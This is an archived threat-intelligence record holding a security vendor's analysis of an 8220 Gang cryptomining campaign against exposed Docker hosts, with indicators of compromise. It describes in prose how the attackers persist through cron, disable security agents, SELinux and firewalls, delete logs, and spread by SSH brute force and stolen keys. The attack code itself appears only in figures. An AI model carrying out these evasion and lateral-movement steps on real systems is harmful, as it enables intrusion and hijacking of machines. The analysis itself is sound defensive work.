{ "id": "62ae61bb-9f61-4193-8593-27c666f420f8", "created_at": "2026-04-06T00:10:27.665378Z", "updated_at": "2026-04-10T13:12:13.902029Z", "deleted_at": null, "sha1_hash": "72e2479bbb5eea0128fb8ca309856be3abd56f26", "title": "8220 Gang Deploys a New Campaign with Upgraded Techniques", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4683065, "plain_text": "8220 Gang Deploys a New Campaign with Upgraded Techniques\r\nBy Nitzan Yaakov Nitzan was a Security Data Analyst at Aqua Nautilus research team.\r\nPublished: 2022-07-07 · Archived: 2026-04-02 11:18:23 UTC\r\nA recent campaign by the 8220 gang, who have been known to exploit the newly discovered critical Confluence\r\nvulnerability (CVE-2022-26134), targeted one of our honeypots. This campaign has evolved over time to\r\ndeliberately target containers. In this game of cat and mouse, the threat actors used some new techniques,\r\nrefurbishing the scripts from one attack to another, adding new capabilities to attack the compromised host, and\r\nspreading the attack to additional hosts. In this blog, we’ll break down this attack, review its techniques, and\r\nanalyze it using a runtime detection and prevention tool.\r\nHere’s what we’re going to cover:\r\nInitial access\r\nExecution and persistence techniques\r\nDefense evasion techniques\r\nDiscovery techniques\r\nLateral movement techniques\r\nCommand and control techniques\r\nImpact techniques\r\nThe malware execution\r\nDetecting the attack\r\nhttps://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134\r\nPage 1 of 20\n\nFigure 1: Jira?Confluence Attack flow (8220 Gang)\r\nInitial access\r\nIn the aforementioned attack, threat actors exploited a misconfigured Docker daemon to run a vanilla Alpine\r\nimage combined with a malicious command to perform the attack. The command consists of multiple download\r\ncommands from a remote server via the shell script jira?confluence . This command-and-control (C2) server\r\nwas used by the attackers throughout the whole attack.\r\nThe name of the shell script is interesting since it’s reminiscent of an event in June when a new vulnerability was\r\ndiscovered that allows remote code execution on Confluence servers. The vulnerability was added to the National\r\nVulnerability Database (NVD) as CVE-2022-26134. It affects several versions of Confluence servers and data\r\ncenters, allowing an unauthenticated attacker to execute arbitrary code and exploit vulnerable versions.\r\nhttps://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134\r\nPage 2 of 20\n\nDuring our investigation, we discovered similarities (apart from the indicative name) in both code and artifacts\r\nbetween attacks that exploited the Confluence vulnerability and the attack that was caught against our honeypots.\r\nThe functions in code, binaries, and C2 infrastructure are most commonly associated with the 8220 gang.\r\nThe container command that was executed on our honeypot is very interesting since it contains a snippet that\r\nmaterializes a download function as a fallback in case the relevant applications on the target host fail to download\r\nthe main payload from the C2 server.\r\nFigure 2: Running a vanilla container image with a command\r\nAs you can see in the screenshot above, the attackers are running alpine with a command. They are trying to\r\nchange the root directory to /mnt directory by using the command chroot /mnt  and running three options of\r\nremote file download ( curl, wget , and lwp-download ). The latter is less known and aims to download large\r\nfiles from the web. As a fallback, the command also creates a temporary directory in /tmp/jira , writes an\r\nencoded snippet in base64, then decodes and executes it.\r\nhttps://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134\r\nPage 3 of 20\n\nFigure 3: Decoded base64\r\nThe screenshot above is the decoded snippet that appeared in the command. As you can see, the attacker deletes a\r\ntemporary file in /var/tmp/.dat and inserts a function that is aimed to replace curl or wget , namely to\r\ndownload files from the web. Below you can see the code in /var/tmp/.dat:\r\nFigure 4: download function (from jira?confluence shell script)\r\nFinally, you can see that this last snippet is a materialization of a download function serving as a fallback in case\r\ncurl, wget , and lwp-download fail.\r\nExecution and persistence techniques\r\nThe main payload in this attack is the jira?confluence shell script, which is executed in our case in the\r\ncontainer. The attacker creates a scheduled job using cron jobs to facilitate the initial execution of the malicious\r\nshell script. There’s also a fallback function, which the attacker uses as a backup to the cron-job to guarantee the\r\nexecution of the malicious code on the compromised machine.\r\nUltimately, the threat actor is trying to create several cron jobs in various locations, which aim to download the\r\nmain payload from the C2 server and execute it. The threat actor uses randomize functions to start automatically\r\non boot time, which assures the execution of the shell script on the machine. This, in turn, allows persistence in\r\ncase the attack is detected and stopped.\r\nhttps://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134\r\nPage 4 of 20\n\nFigure 5: makecron function (from jira?confluence shell script)\r\nAs you can see in the screenshot below, the threat actor is using another function — cronbackup — as a backup to\r\nthe cron job, a method derived from the attacker’s goal to maintain a foothold on the target machine.\r\nhttps://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134\r\nPage 5 of 20\n\nFigure 6: cronbackup function (from jira?confluence shell script)\r\nThis fallback function also checks if cron, crond , and atd are active. If the first two work, then the function\r\nends. If they aren’t active while atd is active, the code is designed to insert during the scheduled cron invocation,\r\nan invocation of the payload. Lastly, if none of the above are active, the attacker defines an infinite loop that\r\nexecutes the payload every five minutes randomly in one of four paths.\r\nDefense evasion techniques\r\nIn this case, the attacker is shutting down the security tools of Alibaba Cloud, Baidu Cloud, and Google Cloud\r\nPlatform (GCP). This is done to evade detection and increase the chances of a successful attack.\r\nhttps://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134\r\nPage 6 of 20\n\nFigure 7: run function (from jira?confluence shell script)\r\nTwo interesting functions are judge and judge2, which are designed to run malware while checking if they aren’t\r\nblocked by the target system. We’ll get to them later in the malware execution section.\r\nFigure 8: judge and judge2 functions (from jira?confluence shell script)\r\nhttps://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134\r\nPage 7 of 20\n\nFurthermore, the attacker also uses various defense evasion techniques. These include disabling the uncomplicated\r\nfirewall (UFW) program and setting new iptables rules to ensure inbound and outbound traffic to and from C2\r\nservers. Moreover, the attacker changes SELinux mode to permissive using the setenforce 0 command, which\r\nenables him to skip any security policies. SELinux is a security module in Linux that provides a mechanism for\r\nsupporting access control security policies.\r\nFigure 9: Defense evasion techniques (from jira?confluence shell script)\r\nAdditionally, the attacker removes attributes from the /etc/ld.so.preload file:\r\nSetting the option that the file can be modified\r\nSetting the option that the file can be opened for writing data in append mode only\r\nAfterward, the attacker has also deleted the content of /ect/ld.so.preload , probably to block any security\r\ncomponents that are set to be loaded before any other libraries.\r\nAfter downloading the shell script to the compromised machine, it’s saved in the /tmp directory. This is probably\r\ndone to avoid detection by agentless solutions that are blind to files written to the tmp directory and memory. The\r\nattacker modifies the directory permissions to make sure any user will have read, write, and execute permissions.\r\nThe attacker is also checking if outbound communication is blocked by firewall or other security components —\r\nfirst, by trying to ping a C2 server that hides behind a domain name (‘jira[.]letmaker[.]top’). If the domain name is\r\nblocked, the attacker will use the IP address directly. Second, by resolving the cryptomining pool with dns, if it’s\r\nblocked, the malware is instructed with a flag.\r\nhttps://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134\r\nPage 8 of 20\n\nFigure 10: Checking communication towards C2 server \u0026 cryptomining pool (from jira?confluence shell script)\r\nLastly, the attacker also deletes log files to hide any suspicious activity within the system:\r\nCron logs\r\nWtmp file that contains the history of all logins and logouts\r\nA secure log file that contains information related to authentication and authorization privileges.\r\n/var/spool/mail/root , which includes messages from tasks that ran during the attack on the\r\ncompromised machine and wrote their output to this path\r\nFigure 11: Logs deletion (from jira?confluence shell script)\r\nDiscovery techniques\r\nIn this scenario, the threat actor is running several scanners to detect and find further targets in the local network,\r\nbrute-forcing to the ssh service or collecting ssh keys from the current target to get into other hosts.\r\nIn the screenshot below, you can see one example in the scan function where the attacker is downloading three\r\ncomponents — masscan, spirit , and px — to conduct brute force to ssh service in the local environment.\r\nWith masscan, a powerful scanner, the threat actor is scanning 10.0.0.0/8, 172.16.0.0.12, and 192.168.0.0/16 for\r\nrunning open ssh service on port 22.\r\nThe ascii files px and pasx (not in the screenshot) are serving as a configuration file for the binary spirit and\r\nspirit-pro. We’ll examine the ssh brute force later in the malware section\r\nhttps://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134\r\nPage 9 of 20\n\nFigure 12: Scan function (from jira?confluence shell script)\r\nMoreover, the attacker is matching the binary in the C2 to the target processor architecture by using the command\r\nuname -m .\r\nLateral movement techniques\r\nThe attacker then propagates his attack, initiating it against additional hosts to abuse them. The attacker harnesses\r\nthe components he downloaded earlier, helping move the malicious code through the internal environment of the\r\ncompromised machine.\r\nThe attacker tries to spread his attack using two methods. In the first one, after discovering vulnerable hosts via a\r\nssh open port, the attacker can initiate ssh brute force against those hosts. If it succeeds, he executes the malicious\r\nshell script and continues spreading the attack.\r\nIn the second method, the attacker exploits previous connections established between the compromised machine\r\nand remote hosts. This data can be found in various files on the host. For example, the known hosts’ file of\r\nprevious ssh connections. The connection is established using a key known to both machines and used as an\r\nidentification that the connection is legit. The attacker uses the details saved on the compromised host required to\r\nestablish the connection – details of the remote host and ssh key to pair between the machines.\r\nhttps://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134\r\nPage 10 of 20\n\nThe attacker creates a loop that generates all combinations of keys, hosts, and users. In case the details are correct,\r\nthe attacker builds the connection to the remote host:\r\nHe provides read permissions and removes all other permissions to the key list.\r\nHe changes the settings of how host keys are checked (KeyHostKeyChecking), which allows adding the\r\nclient host key to the known hosts’ list even if the key isn’t defined as known.\r\nHe changes the settings of BatchMode, making it possible to log in to the remote host and execute\r\ncommands without the password.\r\nFinally, the attacker executes the malicious shell script on the remote host, spreading his attack.\r\nFigure 13: localgo function (from jira?confluence shell script)\r\nCommand-and-control techniques\r\nThe attacker may also set up communication channels with his C2 to extend control over the compromised\r\nmachine. The attacker can use the connection to a C2 server and initiate a reverse shell to allow remote access to\r\nthe compromised machine.\r\nMoreover, the attacker can determine whether the Tsunami malware is currently running on the machine by\r\nchecking the connection with the IRC server (51[.]255[.]171[.]23). If this connection isn’t there, the Tsunami\r\nmalware would then be downloaded and executed. The IP address 51[.]255[.]171[.]23 is marked as malicious and\r\nhas been identified in a campaign that exploits the latest Confluence CVE-2022-26134. We’ll look at how the\r\nTsunami malware works later in the blog.\r\nFigure 14: Checking availability of IRC protocol (from jira?confluence shell script)\r\nImpact techniques\r\nhttps://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134\r\nPage 11 of 20\n\nAll the techniques that the attackers have been using throughout the attack allowed them to reach their ultimate\r\ngoal – to use the machine’s CPU to mine cryptocurrency.\r\nThe attacker modifies the setting of sysctl and enables HugePages, a feature that allows the operating system to\r\nsupport memory pages greater than the default. This technique can accelerate the hash rate (mining speed) by 20-\r\n30%.\r\nFigure 15: Modifies attributes of the system kernel (from jira?confluence shell script)\r\nThe malware execution\r\nThe techniques we reviewed above enabled the attacker to build the foundations to execute the attack. In this\r\nsection, we’ll examine the binaries and files and their role in the attack. The artifacts are the first downloads of the\r\nfunctions judge() and judge2() . The attacker adjusts the artifact’s download according to the machine’s\r\narchitecture to make sure it would run properly.\r\nFirst, the attacker downloads a packed (upx) malware named dbused ( md5=eb2f5e1b8f818cf6a7dafe78aea62c93\r\nand md5=780965bad574e4e7f04433431d0d8f63 ). The malware serves as a cryptominer and is associated with the\r\n8220 gang.\r\nNext, the attacker downloads the bashirc file ( md5: 63a86932a5bad5da32ebd1689aa814b3 and md5:\r\n0ba9e6dcfc7451e386704b2846b7e440 ) known as the Tsunami malware, which is used as a Linux backdoor that\r\nallows remote access to the infected machine. The Tsunami malware uses Internet Relay Chat (IRC) protocol to\r\ncontrol as a client for distributed denial of service attacks (DDoS) on targeted systems and therefore is considered\r\nas an IRC bot.\r\nTo exploit related machines and infect them as well, the attacker initiates a scan function and downloads from the\r\nremote server the following tools:\r\nSpirit binary file ( md5:cba8efad5eda067ef9d10d372a9a9cab and md5:\r\n9a934b00a07847c66b9ddf7268b07dd3 )\r\npx text file\r\nMasscan binary file ( md5: eefc0ce93d254982fbbcd26460f3d10d )\r\nThe attackers are looking for more vulnerable machines on the same network as the infected machine. By\r\nscanning the internal network with the Masscan tool, they search for open ssh ports (22). With a list of the relevant\r\nhosts, the spirit binary, which is a upx file, functions as an ssh scanner tool and uses a px text file, which contains\r\nmore than 10,000 records of usernames and passwords. Then it initiates a brute force attack against the vulnerable\r\nhosts found in the same network to spread the attack and infect them as well.\r\nhttps://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134\r\nPage 12 of 20\n\nThe attacker also tries to spread his attack to remote hosts using known pair host keys from previous connections\r\nperformed from the infected machines. In case the connection is established, the attacker executes his malicious\r\nshell script and infects those machines as well.\r\nOver the past few days, we examined some changes that the attackers made to the script. They’ve added more\r\nfunctions that allow them to hide malicious activities and successfully launch the attack.\r\nThe jira?confluence shell script, which initiates the attack on the compromised machine, was updated with the\r\nfollowing new components:\r\nUsers and passwords file – the attacker has updated the px file with the pasx\r\n( md5=3cd845610e49e11575b5c18596b38389 ) file.\r\nSSH scanner – the attacker has updated the ssh scanner tool used spirit to spirit-pro\r\n( md5=389437dc4db73256913b8d89fab5e7bc and md5=7d72ccaf59619d0011ca02f97ecb1170 ).\r\nSSH brute-force tool – the attacker added a new tool called hxx\r\n( md5=f0551696774f66ad3485445d9e3f7214 ), which is used to perform ssh brute-force attacks and is found\r\nrelated to the 8220 gang.\r\nDetecting the attack\r\nThe story behind this campaign is simple. When a new critical zero-day vulnerability is detected, malicious actors\r\nare rushing to exploit it as quickly as possible and your workloads in production are immediately at risk. You need\r\nto go over them one by one to evaluate if they are vulnerable and can be exploited. Attackers, however, only need\r\nto tweak their tools and add the new exploit to their massive botnets. So, you might lose this race.\r\nRuntime detection and response tools such as Aqua’s Cloud Native Detection and Response (CNDR) are built to\r\ndetect malicious or suspicious behavior in runtime.\r\nIf one of your running workloads is vulnerable to the Confluence vulnerability, CNDR will let you see the\r\nfollowing detections:\r\nhttps://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134\r\nPage 13 of 20\n\nFigure 16: Aqua CNDR dashboard\r\nLet’s start with the dashboard. It shows that over the last hour, we had various detections in our environment.\r\nMoving forward to our incident screen, we see these nine detections:\r\nWhen inspecting these detections, we find out that they are aligned with the attack that we’ve just described\r\nabove.\r\nhttps://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134\r\nPage 14 of 20\n\nFigure 18: Examples of CNDR detections\r\nWe can easily reconstruct the attack kill chain. This can be a hard task when doing incident response, but CNDR\r\nallows us to go over the attack step-by-step:\r\nhttps://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134\r\nPage 15 of 20\n\nhttps://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134\r\nPage 16 of 20\n\nhttps://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134\r\nPage 17 of 20\n\nFigure 19: Attack kill chain\r\nMapping these campaigns to the MITRE ATT\u0026CK framework\r\nhttps://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134\r\nPage 18 of 20\n\nHere we map each component of the attack to the corresponding techniques of the MITRE ATT\u0026CK framework:\r\nConclusion\r\nThis attack emphasizes the continuous evolution of attackers, who are adding new techniques to bypass security\r\ntools, successfully expand the attack to additional hosts, and amplify the impact. Within just a few days, the shell\r\nscript we’ve been investigating has gained new features and binaries. The improvement of the script is designed to\r\nspread the attack more efficiently across the local network and remote hosts.\r\nAttacks like this are growing both in number and sophistication, involving new capabilities and tools. To protect\r\nagainst these kinds of attacks, we recommend following these guidelines:\r\nMake sure to properly configure your environment and avoid exposing unnecessary ports.\r\nFollow security announcements and update your systems to the latest releases.\r\nMonitor container activity to help mitigate issues quickly and minimize disruptions. This also applies\r\nto the runtime environment where suspicious activity can occur.\r\nIn our case, the attack was initiated using the vanilla image alpine:latest , which most organizations use and\r\nallow to run in their environments. Runtime protection solutions such as Aqua’s CNDR are built to detect\r\nhttps://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134\r\nPage 19 of 20\n\nunknown threats and suspicious behavior during runtime. Moreover, drift prevention would have blocked the\r\nexecution of the file that was downloaded from a remote source during runtime and that wasn’t part of the original\r\ncontainer image.\r\nIndications of Compromise (IOCs)\r\nName Type Comment\r\nMD5\r\ndbuser (x86_64) Binary eb2f5e1b8f818cf6a7dafe78aea62c93\r\ndbuser (i686) Binary 780965bad574e4e7f04433431d0d8f63\r\nbashirc (x86_64) Binary 63a86932a5bad5da32ebd1689aa814b3\r\nbashirc (i686) Binary 0ba9e6dcfc7451e386704b2846b7e440\r\nspirit (upx) Binary cba8efad5eda067ef9d10d372a9a9cab\r\nspirit Binary 9a934b00a07847c66b9ddf7268b07dd3\r\nSpirit-pro (upx) Binary 389437dc4db73256913b8d89fab5e7bc\r\nSpirit-pro Binary 7d72ccaf59619d0011ca02f97ecb1170\r\nhxx Binary f0551696774f66ad3485445d9e3f7214\r\nmasscan Binary eefc0ce93d254982fbbcd26460f3d10d\r\npx Text file 26935a6763559c954cd247efcfa71a47\r\npasx Text file 3cd845610e49e11575b5c18596b38389\r\njira?confluence Shell script ed325c84233a432e06a548c131a91a69\r\nIPs and Domains\r\n51[.]255[.]171[.]23\r\n89[.]34[.]27[.]167\r\n167[.]114[.]114[.]169\r\njira[.]letmaker[.]top\r\nSource: https://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134\r\nhttps://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "origins": [ "web" ], "references": [ "https://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134" ], "report_names": [ "8220-gang-confluence-vulnerability-cve-2022-26134" ], "threat_actors": [ { "id": "0b8ea9bb-b729-438a-ae1f-4240db936fd7", "created_at": "2023-06-23T02:04:34.839947Z", "updated_at": "2026-04-10T02:00:04.99239Z", "deleted_at": null, "main_name": "8220 Gang", "aliases": [ "8220 Mining Group", "Returned Libra", "Water Sigbin" ], "source_name": "ETDA:8220 Gang", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "942c5fbc-31df-4aef-8268-e3ccf6692ec8", "created_at": "2024-07-09T02:00:04.434476Z", "updated_at": "2026-04-10T02:00:03.671196Z", "deleted_at": null, "main_name": "Water Sigbin", "aliases": [ "8220 Gang" ], "source_name": "MISPGALAXY:Water Sigbin", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31", "created_at": "2023-01-06T13:46:38.376868Z", "updated_at": "2026-04-10T02:00:02.949077Z", "deleted_at": null, "main_name": "Cleaver", "aliases": [ "G0003", "Operation Cleaver", "Op Cleaver", "Tarh Andishan", "Alibaba", "TG-2889", "Cobalt Gypsy" ], "source_name": "MISPGALAXY:Cleaver", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434227, "ts_updated_at": 1775826733, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/72e2479bbb5eea0128fb8ca309856be3abd56f26.pdf", "text": "https://archive.orkl.eu/72e2479bbb5eea0128fb8ca309856be3abd56f26.txt", "img": "https://archive.orkl.eu/72e2479bbb5eea0128fb8ca309856be3abd56f26.jpg" } }